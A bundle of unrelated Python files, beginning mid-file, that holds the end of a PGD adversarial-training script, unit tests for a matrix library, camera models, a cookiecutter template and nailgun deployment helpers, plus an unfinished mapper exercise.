TRAIN DEFENSE MODEL
"""
print('====== START TRAINING =====')
model = Net()
defense = PGDtraining(model, 'cuda')
defense.generate(train_loader, test_loader, **defense_params["PGDtraining_MNIST"])
print('====== FINISH TRAINING =====')
|
"""
=======
License
=======
Copyright (c) 2014 Thomas Lehmann
Permission is hereby granted, free of charge, to any person obtaining a copy of this
software and associated documentation files (the "Software"), to deal in the Software
without restriction, including without limitation the rights to use, copy, modify, merge,
publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies
or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
# pylint: disable=R0201
import unittest
from hamcrest import assert_that, equal_to
from concept.math.matrix import Matrix
from concept.tools.decorator import validate_test_responsibility_for
def create_matrix(width, height, start=1):
"""
Create a test matrix.
:param width: number of columns for matrix
:param height: number of rows for matrix
:param start: let value start with given value (default: 1)
:returns: matrix instance
"""
matrix = Matrix(width, height)
value = start
for row in range(height):
for column in range(width):
matrix[column, row] = value
value += 1
return matrix
@validate_test_responsibility_for(Matrix)
@validate_test_responsibility_for(Matrix.Cell, True)
@validate_test_responsibility_for(Matrix.Row, True)
@validate_test_responsibility_for(Matrix.Column, True)
@validate_test_responsibility_for(Matrix.Diagonal, True)
class TestMatrix(unittest.TestCase):
""" Testing of class concept.math.matrix.Matrix. """
def test_init(self):
""" Testing of Matrix.__init__, Matrix.width and Matrix.height. """
matrix = Matrix(2, 3)
assert_that(len(matrix.data), equal_to(3))
assert_that(len(matrix.data[0]), equal_to(2))
def test_len(self):
""" Testing of Matrix.height method. """
matrix = Matrix(2, 3)
assert_that(len(matrix), equal_to(3))
def test_setitem(self):
""" Testing of Matrix.__setitem__ method. """
matrix = create_matrix(2, 2)
assert_that(matrix.data[0], equal_to([1, 2]))
assert_that(matrix.data[1], equal_to([3, 4]))
def test_getitem(self):
""" Testing of Matrix.__getitem__ method. """
matrix = create_matrix(2, 2)
assert_that(matrix[0, 0], equal_to(1))
assert_that(matrix[1, 0], equal_to(2))
assert_that(matrix[0, 1], equal_to(3))
assert_that(matrix[1, 1], equal_to(4))
def test_delitem(self):
""" Testing of Matrix.__delitem__ method. """
matrix = create_matrix(2, 2)
del matrix[1, 0]
del matrix[0, 1]
assert_that(matrix[1, 0], equal_to(0))
assert_that(matrix[0, 1], equal_to(0))
def test_create_data(self):
""" Testing of Matrix.create_data static method """
assert_that(Matrix.create_data(3, 2), equal_to([[0, 0, 0], [0, 0, 0]]))
def test_set(self):
""" Testing of Matrix.set method """
matrix = create_matrix(2, 2)
success = matrix.set([99, 88, 77, 66])
assert_that(success, equal_to(True))
assert_that([cell.get() for cell in matrix.cells()], [99, 77, 88, 66])
# more values than matrix has
success = matrix.set([1, 2, 3, 4, 5])
assert_that(success, equal_to(False))
def test_repr(self):
""" Testing of Matrix.__repr__ method """
matrix = create_matrix(3, 2)
expected = "Matrix(3x2:1,4,2,5,3,6)"
assert_that(str(matrix), equal_to(expected))
def test_rows(self):
""" Testing of Matrix.rows method """
matrix = create_matrix(2, 2)
for expected, given in zip([[1, 2], [3, 4]], [row.get() for row in matrix.rows()]):
self.assertEqual(expected, given)
def test_columns(self):
""" Testing of Matrix.columns method """
matrix = create_matrix(2, 2)
for expected, given in zip([[1, 3], [2, 4]], [row.get() for row in matrix.columns()]):
self.assertEqual(expected, given)
def test_diagonals(self):
""" Testing of Matrix.diagonals method """
matrix = create_matrix(2, 2)
for expected, given in zip([[1], [3, 2], [4]],
[diagonal.get() for diagonal in matrix.diagonals()]):
self.assertEqual(expected, given)
def test_main_diagonals(self):
""" Testing of Matrix.main_diagonals method """
matrix = create_matrix(2, 2)
for expected, given in zip([[1, 4], [3, 2]],
[diagonal.get() for diagonal in matrix.main_diagonals()]):
self.assertEqual(expected, given)
def test_cells(self):
""" Testing of Matrix.cells method """
matrix = create_matrix(2, 2)
values = [cell.get() for cell in matrix.cells()]
self.assertEqual([1, 3, 2, 4], values)
def test_clone(self):
""" Testing of Matrix.clone method """
matrix_a = create_matrix(2, 2)
matrix_b = matrix_a.clone()
self.assertEqual(matrix_a.data, matrix_b.data)
def test_add(self):
""" Testing of Matrix.__add__ method. """
matrix_a = create_matrix(2, 2, start=1)
matrix_b = create_matrix(2, 2, start=5)
matrix_c = matrix_a + matrix_b
for expected, given in zip([[6, 8], [10, 12]], [row.get() for row in matrix_c.rows()]):
self.assertEqual(expected, given)
# you cannot say: "matrix + 1234"
self.assertRaises(TypeError, matrix_a.__add__, 1234)
def test_flip(self):
""" Testing of Matrix.flip method """
# testing with even rows and columns
matrix = create_matrix(2, 2)
matrix.flip(True, False)
for expected, given in zip([[3, 4], [1, 2]], [row.get() for row in matrix.rows()]):
self.assertEqual(expected, given)
matrix.flip(False, True)
for expected, given in zip([[4, 3], [2, 1]], [row.get() for row in matrix.rows()]):
self.assertEqual(expected, given)
matrix.flip(True, True)
for expected, given in zip([[1, 2], [3, 4]], [row.get() for row in matrix.rows()]):
self.assertEqual(expected, given)
# testing with odd rows and columns
matrix = create_matrix(3, 3)
matrix.flip(True, False)
expected_data = [[7, 8, 9], [4, 5, 6], [1, 2, 3]]
for expected, given in zip(expected_data, [row.get() for row in matrix.rows()]):
self.assertEqual(expected, given)
matrix.flip(False, True)
expected_data = [[9, 8, 7], [6, 5, 4], [3, 2, 1]]
for expected, given in zip(expected_data, [row.get() for row in matrix.rows()]):
self.assertEqual(expected, given)
matrix.flip(True, True)
expected_data = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
for expected, given in zip(expected_data, [row.get() for row in matrix.rows()]):
self.assertEqual(expected, given)
def test_cell_init(self):
""" Testing of Matrix.Cell.__init__ method """
cell = Matrix.Cell(1, 2, None)
self.assertEqual(1, cell.column)
self.assertEqual(2, cell.row)
self.assertEqual(None, cell.matrix)
def test_cell_get(self):
""" Testing of Matrix.Cell.get method """
matrix = create_matrix(2, 2)
self.assertEqual(1, list(matrix.cells())[0].get())
self.assertEqual(3, list(matrix.cells())[1].get())
self.assertEqual(2, list(matrix.cells())[2].get())
self.assertEqual(4, list(matrix.cells())[-1].get())
def test_cell_set(self):
""" Testing of Matrix.Cell.set method """
matrix = create_matrix(2, 2)
cells = [cell for cell in matrix.cells() if cell.row == 0]
for cell in cells:
cell.set(cell.get() * 10)
values = [cell.get() for cell in matrix.cells()]
self.assertEqual([10, 3, 20, 4], values)
def test_cell_repr(self):
""" Testing of Matrix.Cell.__repr__ method """
matrix = create_matrix(2, 2)
cell = list(matrix.cells())[0]
self.assertEqual("cell(0, 0, 1)", str(cell))
cell = list(matrix.cells())[-1]
self.assertEqual("cell(1, 1, 4)", str(cell))
def test_cell_swap(self):
""" Testing of Matrix.Cell.__repr__ method """
matrix = create_matrix(2, 2)
cell_a = list(matrix.cells())[0]
cell_b = list(matrix.cells())[-1]
cell_a.swap(cell_b)
self.assertEqual("cell(0, 0, 4)", str(cell_a))
self.assertEqual("cell(1, 1, 1)", str(cell_b))
# wrong type to swap with
self.assertRaises(TypeError, cell_a.swap, 1234)
def test_row_init(self):
""" Testing of Matrix.Row.__init__ method """
instance = Matrix.Row(1, None)
self.assertEqual(1, instance.row)
self.assertEqual(None, instance.matrix)
def test_row_set(self):
""" Testing of Matrix.Row.set method """
matrix = create_matrix(2, 2)
# last row:
row = list(matrix.rows())[-1]
row.set([5, 6])
values = [cell.get() for cell in matrix.cells()]
self.assertEqual([1, 5, 2, 6], values)
def test_row_get(self):
""" Testing of Matrix.Row.get method """
matrix = create_matrix(2, 2)
# first row:
row = list(matrix.rows())[0]
self.assertEqual([1, 2], row.get())
# last row:
row = list(matrix.rows())[-1]
self.assertEqual([3, 4], row.get())
def test_row_swap(self):
""" Testing of Matrix.Row.swap method """
matrix = create_matrix(2, 2)
# first row:
row_a = list(matrix.rows())[0]
row_b = list(matrix.rows())[-1]
row_a.swap(row_b)
self.assertEqual([3, 4], row_a.get())
self.assertEqual([1, 2], row_b.get())
# wrong type to swap with
self.assertRaises(TypeError, row_a.swap, 1234)
def test_row_cells(self):
""" Testing of Matrix.Row.cells method """
matrix = create_matrix(2, 2)
row = list(matrix.rows())[-1]
self.assertEqual([3, 4], [cell.get() for cell in row.cells()])
def test_column_init(self):
""" Testing of Matrix.Column.__init__ method """
instance = Matrix.Column(1, None)
self.assertEqual(1, instance.column)
self.assertEqual(None, instance.matrix)
def test_column_get(self):
""" Testing of Matrix.Row.get method """
matrix = create_matrix(2, 2)
# first row:
column = list(matrix.columns())[0]
self.assertEqual([1, 3], column.get())
# last row:
column = list(matrix.columns())[-1]
self.assertEqual([2, 4], column.get())
def test_column_set(self):
""" Testing of Matrix.Row.set method """
matrix = create_matrix(2, 2)
# last row:
column = list(matrix.columns())[-1]
column.set([5, 6])
values = [cell.get() for cell in matrix.cells()]
self.assertEqual([1, 3, 5, 6], values)
def test_column_swap(self):
""" Testing of Matrix.Column.swap method """
matrix = create_matrix(2, 2)
# first row:
column_a = list(matrix.columns())[0]
column_b = list(matrix.columns())[-1]
column_a.swap(column_b)
self.assertEqual([2, 4], column_a.get())
self.assertEqual([1, 3], column_b.get())
# wrong type to swap with
self.assertRaises(TypeError, column_a.swap, 1234)
def test_column_cells(self):
""" Testing of Matrix.Column.cells method """
matrix = create_matrix(2, 2)
column = list(matrix.columns())[-1]
self.assertEqual([2, 4], [cell.get() for cell in column.cells()])
def test_diagonal_init(self):
""" Testing of Matrix.Diagonal.__init__ method """
instance = Matrix.Diagonal(0, 1, 2, 3, None)
self.assertEqual(0, instance.column)
self.assertEqual(1, instance.row)
self.assertEqual(2, instance.step_column)
self.assertEqual(3, instance.step_row)
self.assertEqual(None, instance.matrix)
def test_diagonal_get(self):
""" Testing of Matrix.Diagonal.get method """
matrix = create_matrix(2, 2)
diagonals = list(matrix.diagonals())
self.assertEqual(3, len(diagonals))
self.assertEqual([1], diagonals[0].get())
self.assertEqual([3, 2], diagonals[1].get())
self.assertEqual([4], diagonals[2].get())
def test_diagonal_cells(self):
""" Testing of Matrix.Diagonal.cells method. """
matrix = create_matrix(2, 2)
given_values = [cell.get() for diagonal in matrix.diagonals() for cell in diagonal.cells()]
self.assertEqual([1, 3, 2, 4], given_values)
def test_diagonal_set(self):
""" Testing of Matrix.Diagonal.set method. """
matrix = create_matrix(2, 2)
# last row:
diagonal = list(matrix.diagonals())[1]
diagonal.set([8, 9])
values = [cell.get() for cell in matrix.cells()]
self.assertEqual([1, 8, 9, 4], values)
def test_mul(self):
""" Testing of Matrix.__mul__ method """
self.sub_test_mul_factor()
self.sub_test_mul_matrix_matrix()
self.sub_test_mul_bad()
def sub_test_mul_factor(self):
""" Testing of Matrix.__mul__ method for matrix with a factor """
matrix_a = create_matrix(2, 2)
matrix_b = matrix_a * 10
values = [cell.get() for cell in matrix_b.cells()]
self.assertEqual([10, 30, 20, 40], values)
def sub_test_mul_matrix_matrix(self):
""" Testing of Matrix.__mul__ method of two matrices """
matrix_a = create_matrix(3, 4)
matrix_b = create_matrix(2, 3)
matrix_c = matrix_a * matrix_b
self.assertEqual(matrix_a.height, matrix_c.height)
self.assertEqual(matrix_b.width, matrix_c.width)
expected_rows = [[22, 28], [49, 64], [76, 100], [103, 136]]
for expected, given in zip(expected_rows, [row.get() for row in matrix_c.rows()]):
self.assertEqual(expected, given)
def sub_test_mul_bad(self):
""" Testing of Matrix.__mul__ method of a matrix with an unsupported object. """
matrix = create_matrix(2, 2)
assert_that(matrix * "text", equal_to(None))
|
#! /usr/bin/env python
import sys
speeds = dict()
# for the extension we will need another dictionary
# counts = dict()
for line in sys.stdin:
try:
line = line.strip()
station, speed = line.split('\t')
speed = float(speed)
# Add code here to use the data
except ValueError:
pass
for k, v in speeds.iteritems():
# add code here to output the results
|
#!/usr/bin/env python
import numpy as np
import os, tempfile
import pickle
from pymvg.camera_model import CameraModel
from pymvg.util import point_msg_to_tuple, parse_rotation_msg
import pymvg.align as mcsc_align
from pymvg.test.utils import _build_test_camera, get_default_options
# --------------------- testing -----------------------------
def _generate_uv_raw(width,height):
step = 5
border = 65
uv_raws = []
for row in range(border, height-border, step):
for col in range(border, width-border, step):
uv_raw = [col, row]
uv_raws.append(uv_raw)
return np.array(uv_raws)
def test_dict_roundtrip():
all_options = get_default_options()
for opts in all_options:
yield check_dict_roundtrip, opts
def check_dict_roundtrip(cam_opts):
cam = _build_test_camera(**cam_opts)
d = cam.to_dict()
cam2 = CameraModel.from_dict(d)
assert cam==cam2
def test_projection_to_undistorted1():
at_origin=True # this test mathematically only makes sense of camera at origin
for ROS_test_data in (True,False):
opts = dict(at_origin=at_origin,ROS_test_data=ROS_test_data)
yield check_projection_to_undistorted1, opts
def check_projection_to_undistorted1(cam_opts):
"""check that points along optical axis are imaged onto principal point"""
cam = _build_test_camera(**cam_opts)
for z in np.linspace(0.1, 10, 20):
pt = np.array([[0,0,z]])
result = cam.project_3d_to_pixel( pt, distorted=False )
u,v = result[0]
assert np.allclose(u, cam.P[0,2])
assert np.allclose(v, cam.P[1,2])
def test_camera_distortion_roundtrip():
all_options = get_default_options()
for opts in all_options:
yield check_camera_distortion_roundtrip, opts
def check_camera_distortion_roundtrip(cam_opts):
"""check that uv == distort( undistort( uv ))"""
cam = _build_test_camera(**cam_opts)
uv_raw = _generate_uv_raw(cam.width, cam.height)
uv_rect = cam.undistort( uv_raw )
uv_unrect = cam.distort( uv_rect )
assert uv_raw.shape == uv_unrect.shape
assert np.allclose(uv_raw, uv_unrect, atol=1.0) # within one pixel
def test_camera_projection_roundtrip():
all_options = get_default_options()
for distorted in (True,False):
for opts in all_options:
yield check_camera_projection_roundtrip, opts, distorted
def check_camera_projection_roundtrip(cam_opts,distorted=False):
"""check that uv == project_to_2d( project_to_3d( uv ))"""
cam = _build_test_camera(**cam_opts)
uv_raw = _generate_uv_raw(cam.width, cam.height)
pts3d = cam.project_pixel_to_3d_ray( uv_raw, distorted=distorted )
uv_unrect = cam.project_3d_to_pixel( pts3d, distorted=distorted )
assert uv_raw.shape == uv_unrect.shape
assert np.allclose(uv_raw, uv_unrect, atol=1.0) # within one pixel
def test_extrinsic_msg():
all_options = get_default_options()
for opts in all_options:
yield check_extrinsic_msg, opts
def check_extrinsic_msg(cam_opts):
"""check that ROS message contains actual camera extrinsic parameters"""
cam_opts = cam_opts.copy()
cam_opts['get_input_data']=True
r = _build_test_camera(**cam_opts)
cam = r['cam']
tfm = cam.get_extrinsics_as_bunch()
if 'translation' in r:
assert np.allclose(point_msg_to_tuple(tfm.translation), point_msg_to_tuple(r['translation']))
if 'rotation' in r:
assert np.allclose(parse_rotation_msg(tfm.rotation,force_matrix=True),
parse_rotation_msg(r['rotation'],force_matrix=True))
def test_build_from_M():
all_options = get_default_options()
for opts in all_options:
yield check_built_from_M, opts
def check_built_from_M(cam_opts):
"""check that M is preserved in load_camera_from_M() factory"""
cam_orig = _build_test_camera(**cam_opts)
M_orig = cam_orig.get_M()
cam = CameraModel.load_camera_from_M( M_orig )
assert np.allclose( cam.get_M(), M_orig)
def test_align():
all_options = get_default_options()
for opts in all_options:
yield check_align, opts
def check_align(cam_opts):
cam_orig = _build_test_camera(**cam_opts)
M_orig = cam_orig.get_M()
cam_orig = CameraModel.load_camera_from_M( M_orig )
R1 = np.eye(3)
R2 = np.zeros((3,3))
R2[0,1] = 1
R2[1,0] = 1
R2[2,2] = -1
t1 = np.array( (0.0, 0.0, 0.0) )
t2 = np.array( (0.0, 0.0, 0.1) )
t3 = np.array( (0.1, 0.0, 0.0) )
for s in [1.0, 2.0]:
for R in [R1, R2]:
for t in [t1, t2, t3]:
cam_actual = cam_orig.get_aligned_camera( s, R, t )
M_expected = mcsc_align.align_M( s,R,t, M_orig )
cam_expected = CameraModel.load_camera_from_M( M_expected )
assert cam_actual==cam_expected
def test_problem_M():
"""check a particular M which previously caused problems"""
# This M (found by the DLT method) was causing me problems.
d = {'width': 848,
'name': 'camera',
'height': 480}
M = np.array([[ -1.70677031e+03, -4.10373295e+03, -3.88568028e+02, 6.89034515e+02],
[ -6.19019195e+02, -1.01292091e+03, -2.67534989e+03, 4.51847857e+02],
[ -4.52548832e+00, -3.78900498e+00, -7.35860226e-01, 1.00000000e+00]])
cam = CameraModel.load_camera_from_M( M, **d)
#assert np.allclose( cam.M, M) # we don't expect this since the intrinsic matrix may not be scaled
verts = np.array([[ 0.042306, 0.015338, 0.036328, 1.0],
[ 0.03323, 0.030344, 0.041542, 1.0],
[ 0.036396, 0.026464, 0.052408, 1.0]])
actual = cam.project_3d_to_pixel(verts[:,:3])
expectedh = np.dot( M, verts.T )
expected = (expectedh[:2]/expectedh[2]).T
assert np.allclose( expected, actual )
def test_distortion_yamlfile_roundtrip():
all_options = get_default_options()
for opts in all_options:
yield check_distortion_yamlfile_roundtrip, opts
def check_distortion_yamlfile_roundtrip(cam_opts):
"""check that roundtrip of camera model to/from a yaml file works"""
cam = _build_test_camera(**cam_opts)
fname = tempfile.mktemp(suffix='.yaml')
cam.save_intrinsics_to_yamlfile(fname)
try:
cam2 = CameraModel.load_camera_from_file( fname, extrinsics_required=False )
finally:
os.unlink(fname)
distorted = np.array( [[100.0,100],
[100,200],
[100,300],
[100,400]] )
orig_undistorted = cam.undistort( distorted )
reloaded_undistorted = cam2.undistort( distorted )
assert np.allclose( orig_undistorted, reloaded_undistorted )
def test_camera_mirror_projection_roundtrip():
all_options = get_default_options()
for axis in ('lr','ud'):
for distorted in (True,False):
for opts in all_options:
yield check_camera_mirror_projection_roundtrip, opts, distorted, axis
def check_camera_mirror_projection_roundtrip(cam_opts,distorted=False,axis='lr'):
"""check that a mirrored camera gives reflected pixel coords"""
cam_orig = _build_test_camera(**cam_opts)
cam_mirror = cam_orig.get_mirror_camera(axis=axis)
uv_raw = _generate_uv_raw(cam_orig.width, cam_orig.height)
# Get a collection of 3D points for which we know the pixel location of
pts3d = cam_orig.project_pixel_to_3d_ray( uv_raw, distorted=distorted )
# Now project that through our mirror-image camera.
uv_mirror = cam_mirror.project_3d_to_pixel( pts3d, distorted=distorted )
# Which points should be xnew = (width-x)
expected = np.array(uv_raw)
if axis=='lr':
expected[:,0] = cam_orig.width - uv_raw[:,0]
else:
expected[:,1] = cam_orig.height - uv_raw[:,1]
assert expected.shape == uv_mirror.shape
assert np.allclose(expected, uv_mirror, atol=1.0) # within one pixel
def test_flip():
all_options = get_default_options()
for opts in all_options:
yield check_flip, opts
def check_flip(cam_opts):
cam_orig = _build_test_camera(**cam_opts)
try:
cam_flip = cam_orig.get_flipped_camera()
except NotImplementedError as err:
raise SkipTest(str(err))
# They have different orientation (but same position) in space,
assert not np.allclose( cam_orig.get_rotation(), cam_flip.get_rotation())
assert np.allclose( cam_orig.get_camcenter(), cam_flip.get_camcenter())
eye, lookat, up = cam_orig.get_view()
eye2, lookat2, up2 = cam_flip.get_view()
assert not np.allclose( lookat, lookat2 )
# but they project 3D points to same pixel locations
verts = np.array([[ 0.042306, 0.015338, 0.036328],
[ 1.03323, 2.030344, 3.041542],
[ 0.03323, 0.030344, 0.041542],
[ 0.036396, 0.026464, 0.052408]])
expected = cam_orig.project_3d_to_pixel(verts)
actual = cam_flip.project_3d_to_pixel(verts)
assert np.allclose( expected, actual )
def test_view():
all_options = get_default_options()
for opts in all_options:
yield check_view, opts
def check_view(cam_opts):
"""check that we can reset camera extrinsic parameters"""
# This is not a very good test. (Should maybe check more eye
# positions, more lookat directions, and more up vectors.)
cam_orig = _build_test_camera(**cam_opts)
eye = (10,20,30)
lookat = (11,20,30) # must be unit length for below to work
up = (0,-1,0)
cam_new = cam_orig.get_view_camera(eye, lookat, up)
eye2, lookat2, up2 = cam_new.get_view()
assert np.allclose( eye, eye2)
assert np.allclose( lookat, lookat2 )
assert np.allclose( up, up2 )
# check a case that was previously failing
n=6
x = np.linspace(0, 2*n, n)
theta = np.linspace(0, 2*np.pi, n)
dim = 5.0
for i in range(n):
center = np.array( (x[i], 0.0, dim) )
lookat = center + np.array( (0,1,0))
up = -np.sin(theta[i]), 0, np.cos(theta[i])
cam_new2 = cam_orig.get_view_camera(eye=center, lookat=lookat)
# check a pathological case
center= [ 0., 0., 5.]
lookat= [ 0., 1., 5.]
up = [0,-1,0]
try:
cam_new3 = cam_orig.get_view_camera(eye=center, lookat=lookat, up=up)
except AssertionError as err:
# we should get this exception
pass
else:
assert 1==0, "did not fail test"
def test_camcenter():
"""check that our idea of camera center is theoretically expected value"""
all_options = get_default_options()
for opts in all_options:
cam = _build_test_camera(**opts)
assert np.allclose( cam.get_camcenter(), cam.get_t_inv().T )
def test_stages():
all_options = get_default_options()
for distorted in (True,False):
for opts in all_options:
yield check_stages, opts, distorted
def check_stages(cam_opts, distorted=False):
"""check the sum of all stages equals all stages summed"""
cam = _build_test_camera(**cam_opts)
uv_raw = _generate_uv_raw(cam.width, cam.height)
pts3d = cam.project_pixel_to_3d_ray( uv_raw, distorted=distorted )
# case 1: direct projection to pixels
direct = cam.project_3d_to_pixel( pts3d, distorted=distorted )
# case 2: project to camera frame, then to pixels
cam_frame = cam.project_3d_to_camera_frame(pts3d)
indirect = cam.project_camera_frame_to_pixel(cam_frame, distorted=distorted)
assert np.allclose(direct, indirect)
def test_simple_camera():
center = np.array( (0, 0.0, 5) )
lookat = center + np.array( (0,1,0))
cam = CameraModel.load_camera_simple(fov_x_degrees=90,
eye=center,
lookat=lookat)
def test_equality():
center = np.array( (0, 0.0, 5) )
lookat = center + np.array( (0,1,0))
cam_apple1 = CameraModel.load_camera_simple(fov_x_degrees=90,
eye=center,
lookat=lookat,
name='apple')
cam_apple2 = CameraModel.load_camera_simple(fov_x_degrees=90,
eye=center,
lookat=lookat,
name='apple')
cam_orange = CameraModel.load_camera_simple(fov_x_degrees=30,
eye=center,
lookat=lookat,
name='orange')
assert cam_apple1==cam_apple2
assert cam_apple1!=cam_orange
assert not cam_apple1==cam_orange
def test_pickle_roundtrip():
all_options = get_default_options()
for opts in all_options:
yield check_pickle_roundtrip, opts
def check_pickle_roundtrip(cam_opts):
cam = _build_test_camera(**cam_opts)
buf = pickle.dumps(cam)
cam2 = pickle.loads(buf)
assert cam==cam2
def test_camcenter_like():
all_options = get_default_options()
for opts in all_options:
yield check_camcenter_like, opts
def check_camcenter_like(cam_opts):
cam = _build_test_camera(**cam_opts)
cc_expected = cam.get_camcenter()
for n in range(4):
nparr = np.zeros( (n,3), dtype=np.float )
cc = cam.camcenter_like( nparr )
for i in range(n):
this_cc = cc[i]
assert np.allclose(cc_expected,this_cc)
|
from sphinx.cmd.build import main
from typing import Dict
import pytest
import re
@pytest.mark.parametrize("test_input_repository_hosting_platform", ["GitHub", "GitLab"])
@pytest.mark.parametrize("test_input_project_name", ["A project", "Another project"])
@pytest.mark.parametrize("test_input_using_r", ["Yes", "No"])
def test_request_template_generated_correctly(
cookies,
test_input_repository_hosting_platform: str,
test_input_project_name: str,
test_input_using_r: str,
) -> None:
"""Test the pull or merge request templates are created correctly."""
# Create a new project adding extra context; return it's `project_path` attribute
test_output_project = cookies.bake(
extra_context={
"repository_hosting_platform": test_input_repository_hosting_platform,
"project_name": test_input_project_name,
"using_R": test_input_using_r,
}
)
# Check that the build passes
assert test_output_project.exit_code == 0
assert test_output_project.exception is None
# Define the path to the pull or merge request template
test_output = test_output_project.project_path
if test_input_repository_hosting_platform == "GitHub":
assert test_output.joinpath(".github", "pull_request_template.md").is_file()
elif test_input_repository_hosting_platform == "GitLab":
assert test_output.joinpath(
".gitlab", "merge_request_templates", f"{test_input_project_name}.md"
).is_file()
else:
pytest.fail(
"Unknown `repository_hosting_platform` value: "
f"{test_input_repository_hosting_platform}"
)
@pytest.mark.skip(
reason="Unclear how to test this, unless there is a title in each " "framework"
)
def test_organisational_framework_correct() -> None:
"""Test that the correct organisational framework is built."""
pass
@pytest.mark.parametrize("test_input_repository_name", ["a", "b"])
@pytest.mark.parametrize("test_input_using_r", ["Yes", "No"])
def test_repo_name_directory_correct(
cookies, test_input_repository_name: str, test_input_using_r: str
) -> None:
"""Check the project repository is generated with the correct name."""
# Create a new project adding extra context
test_output_project = cookies.bake(
extra_context={
"repo_name": test_input_repository_name,
"using_R": test_input_using_r,
}
)
# Check that the build passes
assert test_output_project.exit_code == 0
assert test_output_project.exception is None
# Check that the repository name is correct, and it is a directory
assert test_output_project.project_path.name == test_input_repository_name
assert test_output_project.project_path.is_dir()
# Define the test cases for the `test_builds_correctly` test
args_builds_correctly = [
{
"organisation_name": "org_1",
"organisation_handle": "handle_1",
"contact_email": "email@1",
"project_name": "Project_1",
"repo_name": "repo_1",
"overview": "overview_1",
"project_version": "version_1",
},
{
"organisation_name": "org_2",
"organisation_handle": "handle_2",
"contact_email": "email@2",
"project_name": "Project_2",
"repo_name": "repo_2",
"overview": "overview_2",
"project_version": "version_2",
},
]
@pytest.mark.parametrize("test_input_context", args_builds_correctly)
@pytest.mark.parametrize("test_input_repository_hosting_platform", ["GitHub", "GitLab"])
@pytest.mark.parametrize("test_input_organisational_framework", ["GDS", "N/A"])
@pytest.mark.parametrize("test_input_using_r", ["No", "Yes"])
def test_builds_correctly(
cookies,
test_input_context: Dict[str, str],
test_input_repository_hosting_platform: str,
test_input_organisational_framework: str,
test_input_using_r: str,
) -> None:
"""Test that the projects are built correctly with no errors."""
# Create a new project adding extra context
test_output_project = cookies.bake(
extra_context={
**test_input_context,
"repository_hosting_platform": test_input_repository_hosting_platform,
"organisational_framework": test_input_organisational_framework,
"using_R": test_input_using_r,
}
)
# Check that the build passes
assert test_output_project.exit_code == 0
assert test_output_project.exception is None
# Check there are no `cookiecutter.variable_name` entries in any file
all_files = [f for f in test_output_project.project_path.rglob("*") if f.is_file()]
for file in all_files:
try:
with open(file, encoding="utf-8") as f:
assert re.search(r"{+ ?cookiecutter\.\w+ ?}+", f.read()) is None
except UnicodeDecodeError:
continue
# Test that the documentation builds as expected, and then for broken links
test_output_project_docs_folder = test_output_project.project_path.joinpath("docs")
assert (
main(
[
"-b",
"html",
str(test_output_project_docs_folder),
str(test_output_project_docs_folder.joinpath("_build")),
]
)
== 0
)
assert (
main(
[
"-b",
"linkcheck",
str(test_output_project_docs_folder),
str(test_output_project_docs_folder.joinpath("_linkcheck")),
]
)
== 0
)
|
# -*- coding: utf-8 -*-
# Copyright 2013 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import web
from nailgun.db.sqlalchemy.models import Cluster
from nailgun.db.sqlalchemy.models import Task
from nailgun import objects
from nailgun.orchestrator.deployment_serializers \
import DeploymentHASerializer
from nailgun.task.helpers import TaskHelper
from nailgun.test.base import BaseTestCase
class TestTaskHelpers(BaseTestCase):
def create_env(self, nodes):
cluster = self.env.create(
nodes_kwargs=nodes)
cluster_db = self.db.query(Cluster).get(cluster['id'])
objects.NodeCollection.prepare_for_deployment(cluster_db.nodes)
self.db.flush()
return cluster_db
@property
def serializer(self):
return DeploymentHASerializer
def filter_by_role(self, nodes, role):
return filter(lambda node: role in node.all_roles, nodes)
def test_redeploy_all_controller_if_single_controller_failed(self):
cluster = self.create_env([
{'roles': ['controller'], 'status': 'error'},
{'roles': ['controller']},
{'roles': ['controller', 'cinder']},
{'roles': ['compute', 'cinder']},
{'roles': ['compute']},
{'roles': ['cinder']}])
nodes = TaskHelper.nodes_to_deploy(cluster)
self.assertEqual(len(nodes), 3)
controllers = self.filter_by_role(nodes, 'controller')
self.assertEqual(len(controllers), 3)
def test_redeploy_only_compute_cinder(self):
cluster = self.create_env([
{'roles': ['controller']},
{'roles': ['controller']},
{'roles': ['controller', 'cinder']},
{'roles': ['compute', 'cinder']},
{'roles': ['compute'], 'status': 'error'},
{'roles': ['cinder'], 'status': 'error'}])
nodes = TaskHelper.nodes_to_deploy(cluster)
self.assertEqual(len(nodes), 2)
cinders = self.filter_by_role(nodes, 'cinder')
self.assertEqual(len(cinders), 1)
computes = self.filter_by_role(nodes, 'compute')
self.assertEqual(len(computes), 1)
def test_redeploy_all_controller_and_compute_cinder(self):
cluster = self.create_env([
{'roles': ['controller'], 'status': 'error'},
{'roles': ['controller']},
{'roles': ['controller', 'cinder']},
{'roles': ['compute', 'cinder']},
{'roles': ['compute'], 'status': 'error'},
{'roles': ['cinder'], 'status': 'error'}])
nodes = TaskHelper.nodes_to_deploy(cluster)
self.assertEqual(len(nodes), 5)
controllers = self.filter_by_role(nodes, 'controller')
self.assertEqual(len(controllers), 3)
cinders = self.filter_by_role(nodes, 'cinder')
self.assertEqual(len(cinders), 2)
computes = self.filter_by_role(nodes, 'compute')
self.assertEqual(len(computes), 1)
def test_redeploy_with_critial_roles(self):
cluster = self.create_env([
{'roles': ['controller'], 'status': 'error'},
{'roles': ['controller'], 'status': 'provisioned'},
{'roles': ['controller'], 'status': 'provisioned'},
